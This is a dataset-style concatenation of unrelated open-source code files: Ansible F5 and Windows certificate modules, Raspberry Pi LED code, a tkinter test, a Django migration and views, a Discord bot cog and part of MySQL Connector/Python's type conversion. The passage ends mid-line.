description: "web server" connection_limit: 100 rate_limit: 50 ratio: 2 delegate_to: localhost - name: Modify pool member ratio and description bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 ratio: 1 description: "nginx server" delegate_to: localhost - name: Remove pool member from pool bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "absent" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 delegate_to: localhost # The BIG-IP GUI doesn't map directly to the API calls for 
"Pool -> # Members -> State". The following states map to API monitor # and session states. # # Enabled (all traffic allowed): # monitor_state=enabled, session_state=enabled # Disabled (only persistent or active connections allowed): # monitor_state=enabled, session_state=disabled # Forced offline (only active connections allowed): # monitor_state=disabled, session_state=disabled # # See https://devcentral.f5.com/questions/icontrol-equivalent-call-for-b-node-down - name: Force pool member offline bigip_pool_member: server: "lb.mydomain.com" user: "admin" password: "secret" state: "present" session_state: "disabled" monitor_state: "disabled" pool: "my-pool" partition: "Common" host: "{{ ansible_default_ipv4["address"] }}" port: 80 delegate_to: localhost ''' def pool_exists(api, pool): # hack to determine if pool exists result = False try: api.LocalLB.Pool.get_object_status(pool_names=[pool]) result = True except bigsuds.OperationFailed as e: if "was not found" in str(e): result = False else: # genuine exception raise return result def member_exists(api, pool, address, port): # hack to determine if member exists result = False try: members = [{'address': address, 'port': port}] api.LocalLB.Pool.get_member_object_status(pool_names=[pool], members=[members]) result = True except bigsuds.OperationFailed as e: if "was not found" in str(e): result = False else: # genuine exception raise return result def delete_node_address(api, address): result = False try: api.LocalLB.NodeAddressV2.delete_node_address(nodes=[address]) result = True except bigsuds.OperationFailed as e: if "is referenced by a member of pool" in str(e): result = False else: # genuine exception raise return result def remove_pool_member(api, pool, address, port): members = [{'address': address, 'port': port}] api.LocalLB.Pool.remove_member_v2( pool_names=[pool], members=[members] ) def add_pool_member(api, pool, address, port): members = [{'address': address, 'port': port}] api.LocalLB.Pool.add_member_v2( 
pool_names=[pool], members=[members] ) def get_connection_limit(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_connection_limit( pool_names=[pool], members=[members] )[0][0] return result def set_connection_limit(api, pool, address, port, limit): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_connection_limit( pool_names=[pool], members=[members], limits=[[limit]] ) def get_description(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_description( pool_names=[pool], members=[members] )[0][0] return result def set_description(api, pool, address, port, description): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_description( pool_names=[pool], members=[members], descriptions=[[description]] ) def get_rate_limit(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_rate_limit( pool_names=[pool], members=[members] )[0][0] return result def set_rate_limit(api, pool, address, port, limit): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_rate_limit( pool_names=[pool], members=[members], limits=[[limit]] ) def get_ratio(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_ratio( pool_names=[pool], members=[members] )[0][0] return result def set_ratio(api, pool, address, port, ratio): members = [{'address': address, 'port': port}] api.LocalLB.Pool.set_member_ratio( pool_names=[pool], members=[members], ratios=[[ratio]] ) def set_member_session_enabled_state(api, pool, address, port, session_state): members = [{'address': address, 'port': port}] session_state = ["STATE_%s" % session_state.strip().upper()] api.LocalLB.Pool.set_member_session_enabled_state( pool_names=[pool], members=[members], session_states=[session_state] ) def 
get_member_session_status(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_session_status( pool_names=[pool], members=[members] )[0][0] result = result.split("SESSION_STATUS_")[-1].lower() return result def set_member_monitor_state(api, pool, address, port, monitor_state): members = [{'address': address, 'port': port}] monitor_state = ["STATE_%s" % monitor_state.strip().upper()] api.LocalLB.Pool.set_member_monitor_state( pool_names=[pool], members=[members], monitor_states=[monitor_state] ) def get_member_monitor_status(api, pool, address, port): members = [{'address': address, 'port': port}] result = api.LocalLB.Pool.get_member_monitor_status( pool_names=[pool], members=[members] )[0][0] result = result.split("MONITOR_STATUS_")[-1].lower() return result def main(): argument_spec = f5_argument_spec() meta_args = dict( session_state=dict(type='str', choices=['enabled', 'disabled']), monitor_state=dict(type='str', choices=['enabled', 'disabled']), pool=dict(type='str', required=True), host=dict(type='str', required=True, aliases=['address', 'name']), port=dict(type='int', required=True), connection_limit=dict(type='int'), description=dict(type='str'), rate_limit=dict(type='int'), ratio=dict(type='int'), preserve_node=dict(type='bool', default=False) ) argument_spec.update(meta_args) module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True ) if module.params['validate_certs']: import ssl if not hasattr(ssl, 'SSLContext'): module.fail_json(msg='bigsuds does not support verifying certificates with python < 2.7.9. 
Either update python or set validate_certs=False on the task') server = module.params['server'] server_port = module.params['server_port'] user = module.params['user'] password = module.params['password'] state = module.params['state'] partition = module.params['partition'] validate_certs = module.params['validate_certs'] session_state = module.params['session_state'] monitor_state = module.params['monitor_state'] pool = fq_name(partition, module.params['pool']) connection_limit = module.params['connection_limit'] description = module.params['description'] rate_limit = module.params['rate_limit'] ratio = module.params['ratio'] host = module.params['host'] address = fq_name(partition, host) port = module.params['port'] preserve_node = module.params['preserve_node'] if (host and port is None) or (port is not None and not host): module.fail_json(msg="both host and port must be supplied") if 0 > port or port > 65535: module.fail_json(msg="valid ports must be in range 0 - 65535") try: api = bigip_api(server, user, password, validate_certs, port=server_port) if not pool_exists(api, pool): module.fail_json(msg="pool %s does not exist" % pool) result = {'changed': False} # default if state == 'absent': if member_exists(api, pool, address, port): if not module.check_mode: remove_pool_member(api, pool, address, port) if preserve_node: result = {'changed': True} else: deleted = delete_node_address(api, address) result = {'changed': True, 'deleted': deleted} else: result = {'changed': True} elif state == 'present': if not member_exists(api, pool, address, port): if not module.check_mode: add_pool_member(api, pool, address, port) if connection_limit is not None: set_connection_limit(api, pool, address, port, connection_limit) if description is not None: set_description(api, pool, address, port, description) if rate_limit is not None: set_rate_limit(api, pool, address, port, rate_limit) if ratio is not None: set_ratio(api, pool, address, port, ratio) if session_state is not 
None: set_member_session_enabled_state(api, pool, address, port, session_state) if monitor_state is not None: set_member_monitor_state(api, pool, address, port, monitor_state) result = {'changed': True} else: # pool member exists -- potentially modify attributes if connection_limit is not None and connection_limit != get_connection_limit(api, pool, address, port): if not module.check_mode: set_connection_limit(api, pool, address, port, connection_limit) result = {'changed': True} if description is not None and description != get_description(api, pool, address, port): if not module.check_mode: set_description(api, pool, address, port, description) result = {'changed': True} if rate_limit is not None and rate_limit != get_rate_limit(api, pool, address, port): if not module.check_mode: set_rate_limit(api, pool, address, port, rate_limit) result = {'changed': True} if ratio is not None and ratio != get_ratio(api, pool, address, port): if not module.check_mode: set_ratio(api, pool, address, port, ratio) result = {'changed': True} if session_state is not None: session_status = get_member_session_status(api, pool, address, port) if session_state == 'enabled' and session_status == 'forced_disabled': if not module.check_mode: set_member_session_enabled_state(api, pool, address, port, session_state) result = {'changed': True} elif session_state == 'disabled' and session_status != 'forced_disabled': if not module.check_mode: set_member_session_enabled_state(api, pool, address, port, session_state) result = {'changed': True} if monitor_state is not None: monitor_status = get_member_monitor_status(api, pool, address, port) if monitor_state == 'enabled' and monitor_status == 'forced_down': if not module.check_mode: set_member_monitor_state(api, pool, address, port, monitor_state) result = {'changed': True} elif monitor_state == 'disabled' and monitor_status != 'forced_down': if not module.check_mode: set_member_monitor_state(api, pool, address, port, monitor_state) result = 
{'changed': True} except Exception as e: module.fail_json(msg="received exception: %s" % e) module.exit_json(**result) from ansible.module_utils.basic import * from ansible.module_utils.f5 import * if __name__ == '__main__': main()
gpl-3.0
lmprice/ansible
lib/ansible/modules/windows/win_certificate_store.py
16
6975
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: win_certificate_store version_added: '2.5' short_description: Manages the certificate store description: - Used to import/export and remove certificates and keys from the local certificate store. - This module is not used to create certificates and will only manage existing certs as a file or in the store. - It can be used to import PEM, DER, P7B, PKCS12 (PFX) certificates and export PEM, DER and PKCS12 certificates. options: state: description: - If C(present), will ensure that the certificate at I(path) is imported into the certificate store specified. - If C(absent), will ensure that the certificate specified by I(thumbprint) or the thumbprint of the cert at I(path) is removed from the store specified. - If C(exported), will ensure the file at I(path) is a certificate specified by I(thumbprint). - When exporting a certificate, if I(path) is a directory then the module will fail, otherwise the file will be replaced if needed. choices: [ absent, exported, present ] default: present path: description: - The path to a certificate file. - This is required when I(state) is C(present) or C(exported). - When I(state) is C(absent) and I(thumbprint) is not specified, the thumbprint is derived from the certificate at this path. thumbprint: description: - The thumbprint as a hex string to either export or remove. - See the examples for how to specify the thumbprint. store_name: description: - The store name to use when importing a certificate or searching for a certificate. 
- "C(AddressBook): The X.509 certificate store for other users" - "C(AuthRoot): The X.509 certificate store for third-party certificate authorities (CAs)" - "C(CertificateAuthority): The X.509 certificate store for intermediate certificate authorities (CAs)" - "C(Disallowed): The X.509 certificate store for revoked certificates" - "C(My): The X.509 certificate store for personal certificates" - "C(Root): The X.509 certificate store for trusted root certificate authorities (CAs)" - "C(TrustedPeople): The X.509 certificate store for directly trusted people and resources" - "C(TrustedPublisher): The X.509 certificate store for directly trusted publishers" default: My choices: - AddressBook - AuthRoot - CertificateAuthority - Disallowed - My - Root - TrustedPeople - TrustedPublisher store_location: description: - The store location to use when importing a certificate or searching for a certificate. choices: [ CurrentUser, LocalMachine ] default: LocalMachine password: description: - The password of the pkcs12 certificate key. - This is used when reading a pkcs12 certificate file or the password to set when C(state=exported) and C(file_type=pkcs12). - If the pkcs12 file has no password set or no password should be set on the exported file, do not set this option. key_exportable: description: - Whether to allow the private key to be exported. - If C(no), then this module and other process will only be able to export the certificate and the private key cannot be exported. - Used when C(state=present) only. type: bool default: 'yes' key_storage: description: - Specifies where Windows will store the private key when it is imported. - When set to C(default), the default option as set by Windows is used. - When set to C(machine), the key is stored in a path accessible by various users. - When set to C(user), the key is stored in a path only accessible by the current user. - Used when C(state=present) only and cannot be changed once imported. 
- See U(https://msdn.microsoft.com/en-us/library/system.security.cryptography.x509certificates.x509keystorageflags.aspx) for more details. choices: [ default, machine, user ] default: default file_type: description: - The file type to export the certificate as when C(state=exported). - C(der) is a binary ASN.1 encoded file. - C(pem) is a base64 encoded file of a der file in the OpenSSL form. - C(pkcs12) (also known as pfx) is a binary container that contains both the certificate and private key unlike the other options. - When C(pkcs12) is set and the private key is not exportable or accessible by the current user, it will throw an exception. choices: [ der, pem, pkcs12 ] default: der notes: - Some actions on PKCS12 certificates and keys may fail with the error C(the specified network password is not correct), either use CredSSP or Kerberos with credential delegation, or use C(become) to bypass these restrictions. - The certificates must be located on the Windows host to be set with I(path). author: - Jordan Borean (@jborean93) ''' EXAMPLES = r''' - name: import a certificate win_certificate_store: path: C:\Temp\cert.pem state: present - name: import pfx certificate that is password protected win_certificate_store: path: C:\Temp\cert.pfx state: present password: VeryStrongPasswordHere! 
become: yes become_method: runas - name: import pfx certificate without password and set private key as un-exportable win_certificate_store: path: C:\Temp\cert.pfx state: present key_exportable: no # usually you don't set this here but it is for illustrative purposes vars: ansible_winrm_transport: credssp - name: remove a certificate based on file thumbprint win_certificate_store: path: C:\Temp\cert.pem state: absent - name: remove a certificate based on thumbprint win_certificate_store: thumbprint: BD7AF104CF1872BDB518D95C9534EA941665FD27 state: absent - name: remove certificate based on thumbprint is CurrentUser/TrustedPublishers store win_certificate_store: thumbprint: BD7AF104CF1872BDB518D95C9534EA941665FD27 state: absent store_location: CurrentUser store_name: TrustedPublisher - name: export certificate as der encoded file win_certificate_store: path: C:\Temp\cert.cer state: exported file_type: der - name: export certificate and key as pfx encoded file win_certificate_store: path: C:\Temp\cert.pfx state: exported file_type: pkcs12 password: AnotherStrongPass! become: yes become_method: runas become_user: SYSTEM ''' RETURN = r''' thumbprints: description: A list of certificate thumbprints that were touched by the module. returned: success type: list sample: ["BC05633694E675449136679A658281F17A191087"] '''
gpl-3.0
gchinellato/Self-Balance-Robot
examples/Adafruit-Raspberry-Pi-Python-Code/Adafruit_LEDpixels/Adafruit_LEDpixels.py
5
2078
#!/usr/bin/env python # Test code for Adafruit LED Pixels, uses hardware SPI import RPi.GPIO as GPIO, time, os DEBUG = 1 GPIO.setmode(GPIO.BCM) def slowspiwrite(clockpin, datapin, byteout): GPIO.setup(clockpin, GPIO.OUT) GPIO.setup(datapin, GPIO.OUT) for i in range(8): if (byteout & 0x80): GPIO.output(datapin, True) else: GPIO.output(clockpin, False) byteout <<= 1 GPIO.output(clockpin, True) GPIO.output(clockpin, False) SPICLK = 18 SPIDO = 17 ledpixels = [0] * 25 def writestrip(pixels): spidev = file("/dev/spidev0.0", "w") for i in range(len(pixels)): spidev.write(chr((pixels[i]>>16) & 0xFF)) spidev.write(chr((pixels[i]>>8) & 0xFF)) spidev.write(chr(pixels[i] & 0xFF)) spidev.close() time.sleep(0.002) def Color(r, g, b): return ((r & 0xFF) << 16) | ((g & 0xFF) << 8) | (b & 0xFF) def setpixelcolor(pixels, n, r, g, b): if (n >= len(pixels)): return pixels[n] = Color(r,g,b) def setpixelcolor(pixels, n, c): if (n >= len(pixels)): return pixels[n] = c def colorwipe(pixels, c, delay): for i in range(len(pixels)): setpixelcolor(pixels, i, c) writestrip(pixels) time.sleep(delay) def Wheel(WheelPos): if (WheelPos < 85): return Color(WheelPos * 3, 255 - WheelPos * 3, 0) elif (WheelPos < 170): WheelPos -= 85; return Color(255 - WheelPos * 3, 0, WheelPos * 3) else: WheelPos -= 170; return Color(0, WheelPos * 3, 255 - WheelPos * 3) def rainbowCycle(pixels, wait): for j in range(256): # one cycle of all 256 colors in the wheel for i in range(len(pixels)): # tricky math! we use each pixel as a fraction of the full 96-color wheel # (thats the i / strip.numPixels() part) # Then add in j which makes the colors go around per pixel # the % 96 is to make the wheel cycle around setpixelcolor(pixels, i, Wheel( ((i * 256 / len(pixels)) + j) % 256) ) writestrip(pixels) time.sleep(wait) colorwipe(ledpixels, Color(255, 0, 0), 0.05) colorwipe(ledpixels, Color(0, 255, 0), 0.05) colorwipe(ledpixels, Color(0, 0, 255), 0.05) while True: rainbowCycle(ledpixels, 0.00)
gpl-3.0
foodszhang/kbengine
kbe/res/scripts/common/Lib/tkinter/test/test_ttk/test_style.py
94
2900
import unittest import tkinter from tkinter import ttk from test.support import requires, run_unittest from tkinter.test.support import AbstractTkTest requires('gui') class StyleTest(AbstractTkTest, unittest.TestCase): def setUp(self): super().setUp() self.style = ttk.Style(self.root) def test_configure(self): style = self.style style.configure('TButton', background='yellow') self.assertEqual(style.configure('TButton', 'background'), 'yellow') self.assertIsInstance(style.configure('TButton'), dict) def test_map(self): style = self.style style.map('TButton', background=[('active', 'background', 'blue')]) self.assertEqual(style.map('TButton', 'background'), [('active', 'background', 'blue')] if self.wantobjects else [('active background', 'blue')]) self.assertIsInstance(style.map('TButton'), dict) def test_lookup(self): style = self.style style.configure('TButton', background='yellow') style.map('TButton', background=[('active', 'background', 'blue')]) self.assertEqual(style.lookup('TButton', 'background'), 'yellow') self.assertEqual(style.lookup('TButton', 'background', ['active', 'background']), 'blue') self.assertEqual(style.lookup('TButton', 'optionnotdefined', default='iknewit'), 'iknewit') def test_layout(self): style = self.style self.assertRaises(tkinter.TclError, style.layout, 'NotALayout') tv_style = style.layout('Treeview') # "erase" Treeview layout style.layout('Treeview', '') self.assertEqual(style.layout('Treeview'), [('null', {'sticky': 'nswe'})] ) # restore layout style.layout('Treeview', tv_style) self.assertEqual(style.layout('Treeview'), tv_style) # should return a list self.assertIsInstance(style.layout('TButton'), list) # correct layout, but "option" doesn't exist as option self.assertRaises(tkinter.TclError, style.layout, 'Treeview', [('name', {'option': 'inexistent'})]) def test_theme_use(self): self.assertRaises(tkinter.TclError, self.style.theme_use, 'nonexistingname') curr_theme = self.style.theme_use() new_theme = None for theme in 
self.style.theme_names(): if theme != curr_theme: new_theme = theme self.style.theme_use(theme) break else: # just one theme available, can't go on with tests return self.assertFalse(curr_theme == new_theme) self.assertFalse(new_theme != self.style.theme_use()) self.style.theme_use(curr_theme) tests_gui = (StyleTest, ) if __name__ == "__main__": run_unittest(*tests_gui)
lgpl-3.0
adlius/osf.io
osf/migrations/0150_fix_deleted_preprints.py
11
1216
# -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-12-14 19:31 from __future__ import unicode_literals import datetime as dt from django.db import connection from django.db import migrations import pytz dummy_datetime = dt.datetime(1970, 1, 1, tzinfo=pytz.UTC) def forward(state, *args, **kwargs): Preprint = state.get_model('osf', 'Preprint') with connection.cursor() as cursor: cursor.execute(""" SELECT applied FROM django_migrations WHERE name = '0136_preprint_node_divorce' AND app = 'osf' """) npd_release_date = cursor.fetchone()[0] preprints = ( Preprint.objects .filter(created__lt=npd_release_date) .filter(node__is_deleted=True, deleted__isnull=True) ) preprints.update(deleted=dummy_datetime) def backward(state, *args, **kwargs): Preprint = state.get_model('osf', 'Preprint') preprints = ( Preprint.objects .filter(deleted=dummy_datetime) ) preprints.update(deleted=None) class Migration(migrations.Migration): dependencies = [ ('osf', '0149_add_datacite_doi_switch'), ] operations = [ migrations.RunPython(forward, backward) ]
apache-2.0
dhenrygithub/QGIS
python/ext-libs/future/past/types/oldstr.py
62
4300
""" Pure-Python implementation of a Python 2-like str object for Python 3. """ from collections import Iterable from numbers import Integral from past.utils import PY2, with_metaclass _builtin_bytes = bytes class BaseOldStr(type): def __instancecheck__(cls, instance): return isinstance(instance, _builtin_bytes) def unescape(s): """ Interprets strings with escape sequences Example: >>> s = unescape(r'abc\\def') # i.e. 'abc\\\\def' >>> print(s) 'abc\def' >>> s2 = unescape('abc\\ndef') >>> len(s2) 8 >>> print(s2) abc def """ return s.encode().decode('unicode_escape') class oldstr(with_metaclass(BaseOldStr, _builtin_bytes)): """ A forward port of the Python 2 8-bit string object to Py3 """ # Python 2 strings have no __iter__ method: @property def __iter__(self): raise AttributeError def __dir__(self): return [thing for thing in dir(_builtin_bytes) if thing != '__iter__'] # def __new__(cls, *args, **kwargs): # """ # From the Py3 bytes docstring: # bytes(iterable_of_ints) -> bytes # bytes(string, encoding[, errors]) -> bytes # bytes(bytes_or_buffer) -> immutable copy of bytes_or_buffer # bytes(int) -> bytes object of size given by the parameter initialized with null bytes # bytes() -> empty bytes object # # Construct an immutable array of bytes from: # - an iterable yielding integers in range(256) # - a text string encoded using the specified encoding # - any object implementing the buffer API. # - an integer # """ # # if len(args) == 0: # return super(newbytes, cls).__new__(cls) # # Was: elif isinstance(args[0], newbytes): # # We use type() instead of the above because we're redefining # # this to be True for all unicode string subclasses. Warning: # # This may render newstr un-subclassable. 
# elif type(args[0]) == newbytes: # return args[0] # elif isinstance(args[0], _builtin_bytes): # value = args[0] # elif isinstance(args[0], unicode): # if 'encoding' not in kwargs: # raise TypeError('unicode string argument without an encoding') # ### # # Was: value = args[0].encode(**kwargs) # # Python 2.6 string encode() method doesn't take kwargs: # # Use this instead: # newargs = [kwargs['encoding']] # if 'errors' in kwargs: # newargs.append(kwargs['errors']) # value = args[0].encode(*newargs) # ### # elif isinstance(args[0], Iterable): # if len(args[0]) == 0: # # What is this? # raise ValueError('unknown argument type') # elif len(args[0]) > 0 and isinstance(args[0][0], Integral): # # It's a list of integers # value = b''.join([chr(x) for x in args[0]]) # else: # raise ValueError('item cannot be interpreted as an integer') # elif isinstance(args[0], Integral): # if args[0] < 0: # raise ValueError('negative count') # value = b'\x00' * args[0] # else: # value = args[0] # return super(newbytes, cls).__new__(cls, value) def __repr__(self): s = super(oldstr, self).__repr__() # e.g. b'abc' on Py3, b'abc' on Py3 return s[1:] def __str__(self): s = super(oldstr, self).__str__() # e.g. "b'abc'" or "b'abc\\ndef' # TODO: fix this: assert s[:2] == "b'" and s[-1] == "'" return unescape(s[2:-1]) # e.g. 'abc' or 'abc\ndef' def __getitem__(self, y): if isinstance(y, Integral): return super(oldstr, self).__getitem__(slice(y, y+1)) else: return super(oldstr, self).__getitem__(y) def __getslice__(self, *args): return self.__getitem__(slice(*args)) def __contains__(self, key): if isinstance(key, int): return False def __native__(self): return bytes(self) __all__ = ['oldstr']
gpl-2.0
hemebond/kapua
courses/views.py
1
4832
# Copyright 2011 James O'Neill # # This file is part of Kapua. # # Kapua is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Kapua is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Kapua. If not, see <http://www.gnu.org/licenses/>. from django.contrib.auth.decorators import login_required from django.utils.decorators import method_decorator from django.views.generic import ListView, DetailView, UpdateView, \ FormView, CreateView from django.views.generic.detail import SingleObjectMixin from django.http import HttpResponseRedirect from django.shortcuts import redirect from .models import Course, Page from .forms import CourseForm, PageForm class CourseList(ListView): model = Course class CourseAdd(CreateView): template_name = "courses/course_edit.html" form_class = CourseForm context_object_name = "course" @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(CourseAdd, self).dispatch(*args, **kwargs) class CourseDetail(DetailView): template_name = "courses/course_detail.html" model = Course context_object_name = "course" def get(self, request, *args, **kwargs): self.object = self.get_object() if self.object.pages.exists(): return redirect('kapua-page-detail', self.object.pages.get(level=0).pk) context = self.get_context_data(object=self.object) return self.render_to_response(context) class CourseEdit(UpdateView): template_name = "courses/course_edit.html" form_class = CourseForm model = Course class PageAdd(SingleObjectMixin, FormView): model = Course template_name = "courses/page_edit.html" 
form_class = PageForm @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(PageAdd, self).dispatch(*args, **kwargs) def get_form(self, form_class): self.object = self.get_object() return super(PageAdd, self).get_form(form_class) def get_form_kwargs(self): """ Returns the keyword arguments for instantiating the form. """ form_kwargs = super(PageAdd, self).get_form_kwargs() form_kwargs.update({ 'valid_targets': self.object.pages.filter(level__gt=0) }) return form_kwargs def form_valid(self, form): position = form.cleaned_data.get('position', 'last-child') target = form.cleaned_data.get('target', None) course = self.object page = form.save(commit=False) page.course = course if not target: if course.pages.exists(): target = course.pages.get(level=0) position = 'last-child' if target: page.insert_at( target=target, position=position, save=True, ) self.success_url = page.get_absolute_url() else: page.save() self.success_url = course.get_absolute_url() return super(PageAdd, self).form_valid(form) def get_context_data(self, *args, **kwargs): context = super(PageAdd, self).get_context_data(*args, **kwargs) if context['form'].errors: context['error_message'] = context['form'].errors return context class PageDetail(DetailView): template_name = "courses/page_detail.html" context_object_name = "page" model = Page def get_context_data(self, **kwargs): # Call the base implementation first to get a context context = super(PageDetail, self).get_context_data(**kwargs) context['course'] = self.object.course pages = context['course'].pages.all() for index, page in enumerate(pages): if page.pk == self.object.pk: if index > 0: context['previous_page'] = pages[index - 1] if index < (len(pages) - 1): context['next_page'] = pages[index + 1] break # Remove the root page context['pages'] = pages.filter(level__gt=0) # This gets the ancestors of the current page but exluces the # root page context['breadcrumbs'] = pages.filter( lft__lt=self.object.lft, 
rght__gt=self.object.rght ).exclude( level=0 ) return context class PageEdit(UpdateView): template_name = "courses/page_edit.html" form_class = PageForm model = Page @method_decorator(login_required) def dispatch(self, *args, **kwargs): return super(PageEdit, self).dispatch(*args, **kwargs) def form_valid(self, form): self.object = form.save() target = form.cleaned_data.get('target') if target: position = form.cleaned_data.get('position') self.object.move_to( target=target, position=position ) return redirect('kapua-page-detail', self.object.pk)
gpl-3.0
Pikl/PiklBot
cogs/pikl.py
1
1281
import discord from discord.ext import commands class Pikl: """Super pikly commands.""" def __init__(self, bot): self.bot = bot @commands.command(hidden=False) async def helloworld(self): """Hello, world!""" await self.bot.say("Hello, world!") @commands.command(hidden=False) async def postraidembed(self): """Posts an embedded message with a bunch of raid info""" embed = discord.Embed(colour=discord.Colour(0x2ecc40), description="Some helpful information to aid and review [Dawn] raids.\n") embed.set_image(url="https://cdn.discordapp.com/attachments/350137990959464459/354412417381433354/unknown.png") embed.set_thumbnail(url="https://wiki.guildwars2.com/images/5/5e/Legendary_Insight.png") embed.set_author(name="Dawn Raid Information", icon_url="http://raid.pikly.uk/images/dawn-logo.png") embed.set_footer(text=": 'Stack on Pikl'", icon_url="http://raid.pikly.uk/images/dawn-logo.png") embed.add_field(name="Raid Logs & Videos", value="https://raid.pikly.uk/", inline=True) embed.add_field(name="Raid Class Spreadsheet", value="[Spreadsheet here](https://docs.google.com/spreadsheets/d/1zm46Jb8UBIoYP1_mewoOvLKopx_Sks9hYGm8OeWaQI8/edit?usp=sharing)", inline=True) await self.bot.say(embed=embed) def setup(bot): bot.add_cog(Pikl(bot))
gpl-3.0
CharlesMcKinnis/stack-recon
stack-recon/mysql/connector/conversion.py
15
19710
# MySQL Connector/Python - MySQL driver written in Python. # Copyright (c) 2009, 2015, Oracle and/or its affiliates. All rights reserved. # MySQL Connector/Python is licensed under the terms of the GPLv2 # <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most # MySQL Connectors. There are special exceptions to the terms and # conditions of the GPLv2 as it is applied to this software, see the # FOSS License Exception # <http://www.mysql.com/about/legal/licensing/foss-exception.html>. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """Converting MySQL and Python types """ import datetime import time from decimal import Decimal from .constants import FieldType, FieldFlag, CharacterSet from .catch23 import PY2, NUMERIC_TYPES, struct_unpack from .custom_types import HexLiteral class MySQLConverterBase(object): """Base class for conversion classes All class dealing with converting to and from MySQL data types must be a subclass of this class. 
""" def __init__(self, charset='utf8', use_unicode=True): self.python_types = None self.mysql_types = None self.charset = None self.charset_id = 0 self.use_unicode = None self.set_charset(charset) self.set_unicode(use_unicode) self._cache_field_types = {} def set_charset(self, charset): """Set character set""" if charset == 'utf8mb4': charset = 'utf8' if charset is not None: self.charset = charset else: # default to utf8 self.charset = 'utf8' self.charset_id = CharacterSet.get_charset_info(self.charset)[0] def set_unicode(self, value=True): """Set whether to use Unicode""" self.use_unicode = value def to_mysql(self, value): """Convert Python data type to MySQL""" type_name = value.__class__.__name__.lower() try: return getattr(self, "_{0}_to_mysql".format(type_name))(value) except AttributeError: return value def to_python(self, vtype, value): """Convert MySQL data type to Python""" if (value == b'\x00' or value is None) and vtype[1] != FieldType.BIT: # Don't go further when we hit a NULL value return None if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass try: return self._cache_field_types[vtype[1]](value, vtype) except KeyError: return value def escape(self, buf): """Escape buffer for sending to MySQL""" return buf def quote(self, buf): """Quote buffer for sending to MySQL""" return str(buf) class MySQLConverter(MySQLConverterBase): """Default conversion class for MySQL Connector/Python. o escape method: for escaping values send to MySQL o quoting method: for quoting values send to MySQL in statements o conversion mapping: maps Python and MySQL data types to function for converting them. 
Whenever one needs to convert values differently, a converter_class argument can be given while instantiating a new connection like cnx.connect(converter_class=CustomMySQLConverterClass). """ def __init__(self, charset=None, use_unicode=True): MySQLConverterBase.__init__(self, charset, use_unicode) self._cache_field_types = {} def escape(self, value): """ Escapes special characters as they are expected to by when MySQL receives them. As found in MySQL source mysys/charset.c Returns the value if not a string, or the escaped string. """ if value is None: return value elif isinstance(value, NUMERIC_TYPES): return value if isinstance(value, (bytes, bytearray)): value = value.replace(b'\\', b'\\\\') value = value.replace(b'\n', b'\\n') value = value.replace(b'\r', b'\\r') value = value.replace(b'\047', b'\134\047') # single quotes value = value.replace(b'\042', b'\134\042') # double quotes value = value.replace(b'\032', b'\134\032') # for Win32 else: value = value.replace('\\', '\\\\') value = value.replace('\n', '\\n') value = value.replace('\r', '\\r') value = value.replace('\047', '\134\047') # single quotes value = value.replace('\042', '\134\042') # double quotes value = value.replace('\032', '\134\032') # for Win32 return value def quote(self, buf): """ Quote the parameters for commands. General rules: o numbers are returns as bytes using ascii codec o None is returned as bytearray(b'NULL') o Everything else is single quoted '<buf>' Returns a bytearray object. 
""" if isinstance(buf, NUMERIC_TYPES): if PY2: if isinstance(buf, float): return repr(buf) else: return str(buf) else: return str(buf).encode('ascii') elif isinstance(buf, type(None)): return bytearray(b"NULL") else: return bytearray(b"'" + buf + b"'") def to_mysql(self, value): """Convert Python data type to MySQL""" type_name = value.__class__.__name__.lower() try: return getattr(self, "_{0}_to_mysql".format(type_name))(value) except AttributeError: raise TypeError("Python '{0}' cannot be converted to a " "MySQL type".format(type_name)) def to_python(self, vtype, value): """Convert MySQL data type to Python""" if value == 0 and vtype[1] != FieldType.BIT: # \x00 # Don't go further when we hit a NULL value return None if value is None: return None if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass try: return self._cache_field_types[vtype[1]](value, vtype) except KeyError: # If one type is not defined, we just return the value as str try: return value.decode('utf-8') except UnicodeDecodeError: return value except ValueError as err: raise ValueError("%s (field %s)" % (err, 